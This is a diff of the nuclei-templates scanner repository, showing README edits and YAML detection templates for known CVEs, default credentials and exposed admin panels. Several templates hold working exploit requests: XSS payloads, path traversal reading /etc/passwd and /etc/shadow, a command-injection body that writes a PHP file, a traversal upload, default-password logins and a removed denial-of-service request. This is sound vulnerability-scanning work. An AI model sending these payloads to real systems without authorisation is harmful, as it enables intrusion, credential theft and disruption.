+    ├── thinkphp-workflow.yaml
     ├── vbulletin-workflow.yaml
     └── wordpress-workflow.yaml
 ```
 
 </details>
 
-**24 directories, 420 files**.
+**54 directories, 479 files**.
 
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
+📖 Documentation
+-----
+
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+
+💪 Contributions
+-----
+
+Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+
+💬 Discussion
+-----
+
+Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+
+👨‍💻 Community
+-----
+
+You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+
+💡 Notes
+-----
+-  Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
 
-------
-**Notes:** 
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
 
 Thanks again for your contribution and keeping the community vibrant. :heart:

cves/2014/CVE-2014-6271.yaml

@@ -9,7 +9,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/cgi-bin/status"
       - "{{BaseURL}}/cgi-bin/stats"
       - "{{BaseURL}}/cgi-bin/test"

cves/2017/CVE-2017-9506.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-9506
 
 info:
   name: Jira IconURIServlet SSRF
-  author: Ice3man
+  author: pd-team
   severity: high
   description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
 

cves/2018/CVE-2018-1000129.yaml

@@ -11,7 +11,6 @@ requests:
     path:
       - "{{BaseURL}}/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
       - "{{BaseURL}}/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
-      - "{{BaseURL}}:8080/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
     matchers-condition: and
     matchers:
       - type: status

cves/2018/CVE-2018-7251.yaml

@@ -0,0 +1,18 @@
+id: CVE-2018-7251
+
+info:
+  name: AnchorCMS Error Log Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/anchor/errors.log'
+    matchers:
+      - type: word
+        words:
+          - '"date":'
+          - '"message":'
+          - '"trace":['
+        condition: and

cves/2018/CVE-2018-8006.yaml

@@ -0,0 +1,20 @@
+id: CVE-2018-8006
+
+info:
+  name: Apache ActiveMQ XSS
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"><script>alert("1")</script>'
+      - type: word
+        words:
+          - "/html"
+        part: header

cves/2019/CVE-2019-10092.yaml

@@ -0,0 +1,15 @@
+id: CVE-2019-10092
+
+info:
+  name: Apache mod_proxy HTML Injection / Partial XSS
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%5cgoogle.com/evil.html'
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/\\google.com/evil.html\">"

cves/2019/CVE-2019-11580.yaml

@@ -24,7 +24,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
-      - "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
     matchers-condition: and
     matchers:
       - type: word

cves/2019/CVE-2019-14223.yaml

@@ -0,0 +1,19 @@
+id: CVE-2019-14223
+
+info:
+  name: Alfresco Share Open Redirect
+  author: pd-team
+  severity: low
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/share/page/dologin'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"

cves/2019/CVE-2019-2588.yaml

@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
-      - "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
     matchers-condition: and
     matchers:
       - type: word

cves/2019/CVE-2019-2725.yaml

@@ -18,7 +18,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/_async/AsyncResponseService"
-      - "{{BaseURL}}:7001/_async/AsyncResponseService"
     body: >-
       <?xml version="1.0" encoding="UTF-8" ?>
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

cves/2019/CVE-2019-7219.yaml

@@ -0,0 +1,26 @@
+id: CVE-2019-7219
+
+info:
+  name: Zarafa WebApp Reflected XSS
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\"><script>alert(1)</script>"
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

cves/2019/CVE-2019-7609.yaml

@@ -19,7 +19,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/api/timelion/run"
-      - "{{BaseURL}}:5601/api/timelion/run"
     headers:
       User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
       Content-Type: "application/json; charset=utf-8"

cves/2019/CVE-2019-9955.yaml

@@ -0,0 +1,18 @@
+id: CVE-2019-9955
+
+info:
+  name: CVE-2019-9955 Zyxel XSS
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\";alert('1');//"
+          - "<title>Welcome</title>"
+        condition: and

cves/2020/CVE-2020-12116.yaml

@@ -17,12 +17,6 @@ requests:
         Accept: */*
         Connection: close
 
-      - |
-        GET / HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Connection: close
-
       - |
         GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
         Host: {{Hostname}}
@@ -31,14 +25,6 @@ requests:
         Connection: close
         Referer: http://{{Hostname}}
 
-      - |
-        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Cache-Control: max-age=0
-        Connection: close
-        Referer: http://{{Hostname}}:8060/
-
     extractors:
       - type: regex
         name: endpoint

cves/2020/CVE-2020-13942.yaml

@@ -19,7 +19,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/context.json"
-      - "{{BaseURL}}:8181/context.json"
     headers:
       Content-Type: application/json
     body: |

cves/2020/CVE-2020-15129.yaml

@@ -13,7 +13,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
-      - "{{BaseURL}}:8081"
     headers:
       X-Forwarded-Prefix: "https://foo.nl"
     matchers-condition: and

cves/2020/CVE-2020-16139.yaml

@@ -1,28 +0,0 @@
-id: CVE-2020-16139
-
-info:
-  name: Cisco 7937G Denial-of-Service Reboot Attack
-  author: pikpikcu
-  severity: low
-
-# Refrence:-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
-
-requests:
-  - raw:
-      - |
-        POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: header
-        words:
-          - "application/xml"
-      - type: word
-        words:
-          - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

cves/2020/CVE-2020-16846.yaml

@@ -18,7 +18,6 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/run"
-      - "{{BaseURL}}:8000/run"
     body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei"
     headers:
       Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header

cves/2020/CVE-2020-16952.yaml

@@ -15,7 +15,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers-condition: and
     matchers:
       - type: regex

cves/2020/CVE-2020-17518.yaml

@@ -0,0 +1,32 @@
+id: CVE-2020-17518
+
+info:
+  name: Apache Flink Upload Path Traversal
+  author: pd-team
+  severity: critical
+  reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
+
+requests:
+  - raw:
+      - |
+        POST /jars/upload HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Accept-Language: en
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
+        Content-Length: 187
+
+        ------WebKitFormBoundaryoZ8meKnrrso89R6Y
+        Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
+
+        test-poc
+        ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
+
+  - method: GET
+    path:
+      - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this.

cves/2020/CVE-2020-1943.yaml

@@ -0,0 +1,27 @@
+id: CVE-2020-1943
+
+info:
+  name: Apache OFBiz Reflected XSS
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-2551.yaml

@@ -24,7 +24,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/console/login/LoginForm.jsp"
-      - "{{BaseURL}}:7001/console/login/LoginForm.jsp"
     matchers-condition: and
     matchers:
       - type: word

cves/2020/CVE-2020-5410.yaml

@@ -8,8 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
-      - "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
+      - "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
     matchers-condition: and
     matchers:
       - type: status

cves/2020/CVE-2020-5776.yaml

@@ -20,7 +20,7 @@ requests:
         Content-type: application/x-www-form-urlencoded
         Connection: close
 
-        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
+        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
       - |
         POST /magmi/web/magmi_run.php HTTP/1.1
         Host: {{Hostname}}

cves/2020/CVE-2020-6287.yaml

@@ -17,7 +17,7 @@ info:
 
 requests:
   - payloads:
-      data: "payloads/CVE-2020-6287.xml"
+      data: helpers/payloads/CVE-2020-6287.xml
     raw:
       - |
         POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1

cves/2020/CVE-2020-7318.yaml

@@ -14,16 +14,12 @@ info:
     - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
 
 requests:
-  - payloads:
-      port:
-        - "80"
-        - "443"
-        - "8443"
-    raw:
+  - raw:
       - |
         GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
         Connection: close
+
     matchers-condition: and
     matchers:
       - type: status

cves/2020/CVE-2020-7961.yaml

@@ -18,15 +18,12 @@ requests:
         - "systeminfo"  # Windows
         - "lsb_release -a"  # Linux
         - "sysctl kern.ostype"  # macOS
-      port:
-        - "80"
-        - "443"
-        - "8080"
+
     attack: sniper
     raw:
       - |
         POST /api/jsonws/invoke HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
         Content-Length: 4938
         Accept: */*

cves/2020/CVE-2020-8512.yaml

@@ -13,7 +13,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
-      - '{{BaseURL}}:32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
     matchers-condition: and
     matchers:
       - type: word

cves/2020/CVE-2020-9376.yaml

@@ -0,0 +1,35 @@
+id: CVE-2020-9376
+
+info:
+  name: D-Link Information Disclosure via getcfg.php
+  author: whynotke
+  severity: high
+  description: |
+    D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
+    NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+
+    References:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/getcfg.php"
+
+    body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<name>Admin</name>"
+          - "</usrid>"
+          - "</password>"
+        condition: and
+        part: body

cves/2020/CVE-2020-9484.yaml

@@ -12,7 +12,6 @@ requests:
       Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
     path:
       - "{{BaseURL}}/index.jsp"
-      - "{{BaseURL}}:8080/index.jsp"
     matchers-condition: and
     matchers:
       - type: status

default-logins/activemq/activemq-default-login.yaml

@@ -0,0 +1,22 @@
+id: activemq-default-login
+
+info:
+  name: Apache ActiveMQ Default Credentials
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/'
+    headers:
+      Authorization: "Basic YWRtaW46YWRtaW4="
+    matchers:
+      - type: word
+        words:
+          - 'Welcome to the Apache ActiveMQ Console of <b>'
+          - '<h2>Broker</h2>'
+        condition: and
+
+    # We could add a request condition block to only send this request if the
+    # site response URL had activeMQ broker stuff in the source.

default-logins/ambari/ambari-default-credentials.yaml

@@ -0,0 +1,19 @@
+id: ambari-default-credentials
+
+info:
+  name: Apache Ambari Default Credentials
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
+    headers:
+      Authorization: "Basic YWRtaW46YWRtaW4="
+    matchers:
+      - type: word
+        words:
+          - '"Users" : {'
+          - 'AMBARI.'
+        condition: and

default-logins/ofbiz/ofbiz-default-credentials.yaml

@@ -0,0 +1,20 @@
+id: ofbiz-default-credentials
+
+info:
+  name: Apache OfBiz Default Credentials
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/control/login'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
+    matchers:
+      - type: word
+        words:
+          - "ofbiz-pagination-template"
+          - "<span>Powered by OFBiz</span>"
+        condition: and

default-logins/rabbitmq/rabbitmq-default-admin.yaml

@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/api/whoami"
-      - "{{BaseURL}}:15672/api/whoami"
     headers:
       Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
     matchers-condition: and

default-logins/solarwinds/solarwinds-default-admin.yaml

@@ -16,7 +16,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
-      - "{{BaseURL}}:17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
+
     headers:
       Authorization: "Basic YWRtaW46"
     matchers-condition: and

default-logins/zabbix/zabbix-default-credentials.yaml

@@ -0,0 +1,26 @@
+id: zabbix-default-credentials
+
+info:
+  name: Zabbix Default Credentials
+  author: pd-team
+  severity: critical
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/index.php'
+    headers:
+      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      X-Requested-With: XMLHttpRequest
+
+    body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "zabbix.php?action=dashboard.view"
+
+      - type: status
+        status:
+          - 302

dns/cname-service-detector.yaml

@@ -2,7 +2,7 @@ id: cname-service-detector
 
 info:
   name: 3rd party service checker
-  author: bauthard
+  author: pd-team
   severity: info
 
 dns:

dns/servfail-refused-hosts.yaml

@@ -2,7 +2,7 @@ id: servfail-refused-hosts
 
 info:
   name: Servfail Host Finder
-  author: mzack9999
+  author: pd-team
   severity: info
 
 dns:

exposed-panels/active-admin-exposure.yaml

@@ -0,0 +1,17 @@
+id: active-admin-exposure
+
+info:
+  name: ActiveAdmin Admin Dasboard Exposure
+  author: pd-team
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/login'
+    matchers:
+      - type: word
+        words:
+          - "active_admin_content"
+          - "active_admin-"
+        condition: and

exposed-panels/activemq-panel.yaml

@@ -0,0 +1,18 @@
+id: activemq-panel
+
+info:
+  name: Apache ActiveMQ Exposure
+  author: pd-team
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<h2>Welcome to the Apache ActiveMQ!</h2>'
+          - '<title>Apache ActiveMQ</title>'
+        condition: and

exposed-panels/airflow-exposure.yaml

@@ -0,0 +1,18 @@
+id: airflow-exposure
+
+info:
+  name: Apache Airflow Exposure / Unauthenticated Access
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/admin/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Airflow - DAGs</title>'
+          - '<a href="https://github.com/apache/airflow">'
+        condition: and

exposed-panels/ambari-exposure.yaml

@@ -0,0 +1,18 @@
+id: ambari-exposure
+
+info:
+  name: Apache Ambari Exposure / Unauthenticated Access
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Ambari</title>'
+          - 'href="http://www.apache.org/licenses/LICENSE-2.0"'
+        condition: and

exposed-panels/ansible-tower-exposure.yaml

@@ -0,0 +1,18 @@
+id: ansible-tower-exposure
+
+info:
+  name: Ansible Tower Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - "<title>Ansible Tower</title>"
+          - "ansible-main-menu"
+        condition: and

exposed-panels/atlassian-crowd-panel.yaml

@@ -1,4 +1,5 @@
 id: atlassian-crowd-panel
+
 info:
   name: Atlassian Crowd panel detect
   author: organiccrap

exposed-panels/citrix-vpn-detect.yaml

@@ -2,7 +2,7 @@ id: citrix-vpn-detect
 
 info:
   name: Citrix VPN Detection
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:

exposed-panels/couchdb-exposure.yaml

@@ -0,0 +1,18 @@
+id: couchdb-exposure
+
+info:
+  name: Apache CouchDB Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/_all_dbs'
+    matchers:
+      - type: word
+        words:
+          - CouchDB/
+          - Erlang OTP/
+        part: header
+        condition: and

exposed-panels/couchdb-fauxton.yaml

@@ -0,0 +1,16 @@
+id: couchdb-fauxton
+
+info:
+  name: Apache CouchDB Fauxton Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Project Fauxton</title>'

exposed-panels/django-admin-panel.yaml

@@ -0,0 +1,17 @@
+id: django-admin-panel
+
+info:
+  name: Python Django Admin Panel
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/login/?next=/admin/"
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/admin/\">Django administration</a>"
+        condition: and
+        part: body

exposed-panels/druid-console-exposure.yaml

@@ -0,0 +1,18 @@
+id: druid-console-exposure
+
+info:
+  name: Alibaba Druid Console Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - 'src="/druid.js"'
+          - 'href="/druid.css"'
+        condition: and

exposed-panels/exposed-pagespeed-global-admin.yaml

@@ -0,0 +1,15 @@
+id: exposed-pagespeed-global-admin
+
+info:
+  name: Apache PageSpeed Global Admin Dashboard Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/pagespeed_admin/'
+    matchers:
+      - type: word
+        words:
+          - "<b>Pagespeed Admin</b>"

exposed-panels/exposed-webalizer.yaml

@@ -0,0 +1,17 @@
+id: exposed-webalizer
+
+info:
+  name: Publicly exposed Webalizer Interface
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/webalizer/'
+    matchers:
+      - type: word
+        words:
+          - "Webalizer Version"
+          - "Usage statistics for"
+        condition: and

exposed-panels/flink-exposure.yaml

@@ -0,0 +1,16 @@
+id: flink-exposure
+
+info:
+  name: Apache Flink Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Apache Flink Web Dashboard</title>'

exposed-panels/fortiweb-panel.yaml

@@ -0,0 +1,24 @@
+id: fortiweb-login
+
+info:
+  name: Fortinet FortiWeb Login Panel
+  author: PR3R00T
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Please login"
+          - "ftnt-fortinet-grid"
+          - "main-fortiweb.css"
+        condition: and
+        part: body
+
+      - type: status
+        status:
+          - 200

exposed-panels/hadoop-exposure.yaml

@@ -0,0 +1,15 @@
+id: hadoop-exposure
+
+info:
+  name: Apache Hadoop Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dfshealth.html'
+    matchers:
+      - type: word
+        words:
+          - '<div class="navbar-brand">Hadoop</div>'

exposed-panels/kafka-connect-ui.yaml

@@ -0,0 +1,16 @@
+id: kafka-connect-ui
+
+info:
+  name: Apache Kafka Connect UI Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Kafka Connect UI</title>'

exposed-panels/kafka-monitoring.yaml

@@ -0,0 +1,17 @@
+id: kafka-monitoring
+
+info:
+  name: Apache Kafka Monitor Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '>KafkaMonitor</a>'
+          - '>Kafka Monitor GUI</h1>'

exposed-panels/kafka-topics-ui.yaml

@@ -0,0 +1,16 @@
+id: kafka-topics-ui
+
+info:
+  name: Apache Kafka Topics UI Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - '<title>Kafka Topics UI - Browse Kafka Data</title>'

exposed-panels/kubernetes-dashboard.yaml

@@ -0,0 +1,15 @@
+id: kubernetes-dashboard
+
+info:
+  name: Kubernetes Console Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        words:
+          - "Kubernetes Dashboard</title>"

exposed-panels/parallels-html-client.yaml

@@ -2,7 +2,7 @@ id: parallels-html-client
 
 info:
   name: Parallels HTML5 Client
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:

exposed-panels/phpmyadmin-panel.yaml

@@ -2,7 +2,7 @@ id: phpmyadmin-panel
 
 info:
   name: phpMyAdmin Panel
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:

exposed-panels/prometheus-exporter-detect.yaml

@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     matchers-condition: and

exposed-panels/public-tomcat-manager.yaml

@@ -1,15 +1,15 @@
-id: public-tomcat-instance
+id: public-tomcat-manager
 
 info:
   name: tomcat manager disclosure
-  author: Ahmed Sherif
+  author: Ahmed Sherif & geeknik
   severity: info
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/manager/html'
-      - '{{BaseURL}}:8080/manager/html'
+
     matchers-condition: and
     matchers:
       - type: word
@@ -18,3 +18,5 @@ requests:
       - type: status
         status:
           - 401
+          - 200
+        condition: or

exposed-panels/rabbitmq-dashboard.yaml

@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}'
-      - "{{BaseURL}}:15672"
     matchers:
       - type: word
         words:

exposed-panels/rocketmq-console-exposure.yaml

@@ -0,0 +1,16 @@
+id: rocketmq-console-exposure
+
+info:
+  name: Apache RocketMQ Console Exposure
+  author: pd-team
+  severity: medium
+
